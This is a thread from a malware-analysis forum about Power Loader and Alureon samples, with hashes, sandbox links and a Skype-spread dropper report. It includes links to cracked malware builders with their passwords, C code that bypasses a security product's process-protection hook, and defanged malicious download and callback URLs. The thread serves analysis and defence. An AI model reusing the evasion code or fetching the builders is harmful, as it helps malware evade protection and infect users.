A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18730  by EP_X0FF
 Thu Mar 28, 2013 2:31 am
Part of the Win32/Alureon family with a Gapz-style inject (see @004049C0 and @004045D0). Moved.

Expect more and more copy-paste; see this trojan development topic as an example (and for the original inject method's author, see post #4)
hxxp://wasm.ru/forum/viewtopic.php?id=47590
 #18977  by EP_X0FF
 Wed Apr 17, 2013 6:44 am
@readyde

You chose the wrong forum to post this. Solve your malware "business" problems elsewhere. We do not create/support malware here, and this forum is not a script-kiddie malware marketplace for this kind of "blacklisting". This behaviour is not welcome and, furthermore, next time, whoever tries to do this again will be immediately and permanently banned.

Posts disapproved.
 #18978  by EP_X0FF
 Wed Apr 17, 2013 6:55 am
Another Power Loader + payload (Bitcoin miner). Both in the attachment.

SHA256: 9507b7eabaf22758ad6724f4e63c6772e04992f42b56e1281571b3fbeba00a3a
SHA1: 9d9ae3d4d8a0f0959e84a098483debe19811adf6
MD5: 06708d4bb90b6d3761b62302dbf96f36

https://www.virustotal.com/en/file/9507 ... /analysis/

SHA256: 10bfd9746863fd90e7c7b204a2a0a0c529f12b5a7dea51858e81f32698c168f8
SHA1: 745fbaf750124630f9c440f24d7753c582a748ad
MD5: 5c99411fa8a11691771a476ff52a9344

https://www.virustotal.com/en/file/10bf ... /analysis/
Attachments
pass: infected
 #18986  by rinn
 Wed Apr 17, 2013 8:02 pm
grum wrote: :D cracked public now

annloader_1d 2011

http://goo.gl/wUIBl

pass: gangcash@jabber.org


PowerLoader_v2.0

http://goo.gl/LLJXT

pass: gangcash@jabber.org
It is a bit outdated. Power Loader has been available since last autumn and, besides using the public explorer.exe ACE bug, also has specific code against the Outpost product. Well, it is using the same trick I've been using for the last 2 years in a penetration testing toolkit (alongside a couple of other still-private methods, unseen in ITW malware), mentioned here http://www.kernelmode.info/forum/viewto ... 5&start=60
Code:
	HANDLE hProcess = NULL;
	NTSTATUS NtStatus;
	PCLIENT_ID pcid;
	OBJECT_ATTRIBUTES obja;
	DWORD fOldProtect;
	/* ExplorerPID (PID of explorer.exe) and IsProcessRunning() are the poster's own
	   helpers, obtained/defined earlier in the toolkit and not shown here. */

	/* Only needed when Outpost's process monitor (op_mon.exe) is present. */
	if (IsProcessRunning(L"op_mon.exe")) {

		/* Put the CLIENT_ID on a page of its own... */
		pcid = (CLIENT_ID *)VirtualAlloc(NULL, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
		pcid->UniqueProcess = (HANDLE)(ULONG_PTR)ExplorerPID;
		/* ...then mark it PAGE_GUARD: the first access raises STATUS_GUARD_PAGE_VIOLATION. */
		VirtualProtect(pcid, PAGE_SIZE, PAGE_READWRITE | PAGE_GUARD, &fOldProtect);
		InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
		/* Outpost's hook faults while reading pcid and passes the call on to the real NtOpenProcess. */
		NtStatus = NtOpenProcess(&hProcess, PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, &obja, pcid);
		if ( !NT_SUCCESS(NtStatus) ) {
			/* Fall back to the ordinary open if the trick did not work. */
			hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, ExplorerPID);
		}
	}
The idea of this method: abuse the badly written handler of an SSDT hook. When Outpost tries to access the NtOpenProcess parameters it will catch an exception, because the CLIENT_ID is memory marked with the PAGE_GUARD flag. Once the exception has occurred, Outpost transfers control to the original Windows service, thinking all is OK. This is an example of the mindless coding style so often seen in security drivers. Lack of professionalism, as it is.

Attached loader retrieved from EP_X0FF's sample. For the code I mention, look at the function located at address 0x00404830.

Best Regards,
-rin
Attachments
password "infected" w/o quotes
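Added example (editor's, not rinn's code and not from Power Loader): a portable model of the fail-open hook described in the post above. It uses Linux mprotect(PROT_NONE) plus a SIGSEGV handler in place of PAGE_GUARD and the driver's exception handler, since the Windows kernel case cannot be run here; the protected pid 1234 and the two hook variants are constructed for the demo. The bad hook treats "could not read the caller's CLIENT_ID" as "nothing to check" and lets the call through; the fail-closed hook denies instead.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

typedef struct {
    unsigned long UniqueProcess;     /* mirrors CLIENT_ID.UniqueProcess */
    unsigned long UniqueThread;
} client_id_t;

enum decision { ALLOW = 0, DENY = 1 };

#define PROTECTED_PID 1234UL         /* constructed: pid the modelled product shields */

static sigjmp_buf fault_jmp;

/* Stand-in for the driver's exception handler: unwind back into the hook. */
static void on_fault(int sig)
{
    (void)sig;
    siglongjmp(fault_jmp, 1);
}

static void install_fault_handler(void)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = SA_NODEFER;
    sigaction(SIGSEGV, &sa, NULL);
    sigaction(SIGBUS, &sa, NULL);
}

static long page_size(void) { return sysconf(_SC_PAGESIZE); }

/* Attacker side: CLIENT_ID on its own page, then made unreadable. PROT_NONE
   stands in for PAGE_GUARD; a real guard clears itself on the first touch,
   which unguard() reproduces by hand after the fault. */
client_id_t *make_guarded_client_id(unsigned long pid)
{
    client_id_t *cid = mmap(NULL, page_size(), PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (cid == MAP_FAILED) abort();
    cid->UniqueProcess = pid;
    cid->UniqueThread = 0;
    mprotect(cid, page_size(), PROT_NONE);
    return cid;
}

client_id_t *make_plain_client_id(unsigned long pid)
{
    client_id_t *cid = calloc(1, sizeof *cid);
    cid->UniqueProcess = pid;
    return cid;
}

static void unguard(client_id_t *cid)
{
    unsigned long base = (unsigned long)cid & ~((unsigned long)page_size() - 1);
    mprotect((void *)base, page_size(), PROT_READ | PROT_WRITE);
}

/* Read the pid from the caller's struct; returns 0 if the page is inaccessible. */
static int read_pid(const client_id_t *cid, unsigned long *pid)
{
    install_fault_handler();
    if (sigsetjmp(fault_jmp, 1) != 0)
        return 0;                                   /* came back from on_fault */
    *pid = ((const volatile client_id_t *)cid)->UniqueProcess;
    return 1;
}

/* Outpost-style handler: fault while touching parameters -> original service. */
enum decision hook_fail_open(client_id_t *cid)
{
    unsigned long pid = 0;
    if (!read_pid(cid, &pid)) {
        unguard(cid);               /* guard consumed; the real service reads it fine */
        return ALLOW;
    }
    return pid == PROTECTED_PID ? DENY : ALLOW;
}

/* Fail-closed handler: cannot validate -> refuse. */
enum decision hook_fail_closed(client_id_t *cid)
{
    unsigned long pid = 0;
    if (!read_pid(cid, &pid))
        return DENY;
    return pid == PROTECTED_PID ? DENY : ALLOW;
}

/* 1 if a guarded CLIENT_ID gets past the fail-open hook and is then readable. */
int guarded_bypass_works(void)
{
    client_id_t *g = make_guarded_client_id(PROTECTED_PID);
    return hook_fail_open(g) == ALLOW && g->UniqueProcess == PROTECTED_PID;
}

int main(void)
{
    printf("plain CLIENT_ID, fail-open hook:   %s\n",
           hook_fail_open(make_plain_client_id(PROTECTED_PID)) == DENY ? "DENY" : "ALLOW");
    printf("guarded CLIENT_ID, fail-open hook: %s\n", guarded_bypass_works() ? "ALLOW (bypassed)" : "DENY");
    printf("guarded CLIENT_ID, fail-closed:    %s\n",
           hook_fail_closed(make_guarded_client_id(PROTECTED_PID)) == DENY ? "DENY" : "ALLOW");
    return 0;
}
```

The hardening point is in the last function only: a monitor that cannot read or validate a user-supplied parameter must deny (or copy the parameter under its own probe and pass the copy down), never hand the untouched call to the original service.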
 #19274  by EP_X0FF
 Wed May 15, 2013 10:10 am
SHA256: a5d9b4226432b63eac41b5e47e1e277730fcd31d00d25bec31095de12c7777b3
SHA1: c2b50af1220aeaf076ada73665a734634d15ec5d
MD5: 2dff72099f977da97672e01e7f4ca2e1

https://www.virustotal.com/en/file/a5d9 ... /analysis/

Original, decrypted dropper + extracted x64 binary in the attachment.

x86-32
https://www.virustotal.com/en/file/4b88 ... 368612442/

x64
https://www.virustotal.com/en/file/53e1 ... 368612443/

x86-32 quote (OutputDebugString)
Is what you've seen too much to take, or are you blind and seeing nothing? Through senses, what can we explain? Not joy, not guilt, not pain So run my baby run my baby run
x64 quote (OutputDebugString)
I'm tired holding up the weight,the weight of the motherfucking world! Am I too last to be saved? Am I too last? The boys wanna fight
Attachments
pass: infected
 #19351  by kekieres
 Mon May 20, 2013 7:00 pm
I've recently received a malware sample.

Spreading mechanism: you receive a chat message from a Skype contact saying (in Spanish)
"esta es una foto muy amable de tu parte" ("this is a very kind photo on your part")
(It's grammatically correct but doesn't sound natural in Spanish)
And the following URL:
hXXp://goo.gl/lLGdM?png=<your_skype_contact_name>
In fact, the parameters are irrelevant.
Regardless of the parameters, it always expands to:
hXXp://dc663.4shared.com/download/arUNCWir?clientType=BASE_WEB

The malware comes in a ZIP file, and inside is the EXE named: fotos_facebook-20052013-png.exe
SHA1: 882da1b7838bc087c753a14b0dd1e40cd3db78d3
Here you have the sample.
Right now it's almost undetected on VirusTotal (3/47).
I'm not good at reverse engineering and deep malware analysis, but I've used malwr.com to do a dynamic analysis (https://malwr.com/analysis/ZDdkOWViY2Qy ... TJjZTU5N2E)
Obviously it's nothing good. It tries to contact hXXp://r.gigaionjumbie.biz/images/gx.php

Is it a known malware?
Attachments